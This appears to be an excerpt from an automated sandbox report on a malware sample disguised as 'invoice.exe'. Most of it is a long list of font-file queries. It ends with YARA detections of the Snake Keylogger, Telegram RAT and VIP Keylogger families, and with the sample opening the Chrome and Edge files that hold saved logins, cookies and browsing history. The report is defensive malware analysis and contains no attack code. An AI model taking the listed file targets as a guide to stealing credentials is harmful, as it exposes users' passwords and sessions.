Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Users\user\Desktop\invoice.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\invoice.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000002.00000002.4135565493.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 2.2.invoice.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.invoice.exe.4ec7078.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.invoice.exe.4e83658.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.invoice.exe.4e83658.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.invoice.exe.4ec7078.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4132870602.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1711700056.0000000004E83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: invoice.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: invoice.exe PID: 7644, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 2.2.invoice.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.invoice.exe.4ec7078.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.invoice.exe.4e83658.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.invoice.exe.4e83658.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.invoice.exe.4ec7078.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4135565493.00000000032EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4132870602.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1711700056.0000000004E83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: invoice.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: invoice.exe PID: 7644, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\invoice.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\invoice.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
